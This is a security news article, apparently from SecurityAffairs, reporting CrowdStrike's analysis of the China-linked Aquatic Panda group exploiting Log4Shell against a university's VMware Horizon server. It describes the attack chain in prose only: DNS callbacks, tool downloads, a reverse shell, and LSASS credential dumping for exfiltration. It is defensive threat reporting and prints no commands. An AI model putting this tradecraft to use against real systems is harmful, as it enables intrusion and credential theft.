U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|
Advertisement

Ad Placeholder

Full Width × 90

APT

China-linked APT group Aquatic Panda leverages Log4Shell in recent attack

China-linked APT group Aquatic Panda is exploiting the Log4Shell vulnerability to compromise a large academic institution. China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE 2021-44228) in an attack aimed at a large academic institution. According to the Crowdstrike OverWatch team, the APT group is using a modified version of the Log4j […]

Log4Shell aquatic panda

China-linked APT group Aquatic Panda is exploiting the Log4Shell vulnerability to compromise a large academic institution.

China-linked cyberespionage group Aquatic Panda was spotted exploiting the Log4Shell vulnerability (CVE 2021-44228) in an attack aimed at a large academic institution.

According to the Crowdstrike OverWatch team, the APT group is using a modified version of the Log4j exploit published on GitHub on December 13.

Log4Shell aquatic panda

Threat actors used the exploit in their attacks for reconnaissance purposes.

In the attack against the unnamed academic institution, threat actors targeted a VMware Horizon Tomcat web server that was using the Log4j library.

The attackers were observed performing multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, running on the VMware Horizon instance.

The researchers explained that multiple threat actors utilize publicly accessible DNS logging services like dns[.]1433[.]eu[.]org to identify vulnerable servers when they connect back to the attacker-controlled DNS service.

The attackers executed multiple Linux commands on a Windows host on which the Apache Tomcat service was running, some of them with the intent to retrieve hacking tools from remote infrastructure.

“The threat actor then executed a series of Linux commands, including attempting to execute a  bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat actor tooling hosted on remote infrastructure.” reads the analysis published by CrowdStrike. “Our CrowdStrike Intelligence team later linked the infrastructure to the threat actor known as AQUATIC PANDA.”

AQUATIC PANDA conducted reconnaissance from the host, using native OS binaries, it also attempts to stop a third-party endpoint detection and response (EDR) service. 

Then threat actor downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware and three files with VBS file extensions from remote infrastructure. 

The files are a reverse shell, which was loaded into memory via DLL search-order hijacking

The APT group also made multiple attempts at credential harvesting by dumping the memory of the LSASS process using living-off-the-land binaries. The threat actor also leveraged winRAR to compress the memory dump for later exfiltration.

The good news is that the attack was spotted by the researchers and experts alerted the target organization that quickly addressed the vulnerable system.

“Throughout the intrusion, OverWatch tracked the threat actor’s activity closely in order to provide continuous updates to the victim organization. Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, AQUATIC PANDA)

[adrotate banner=”5″]

[adrotate banner=”13″]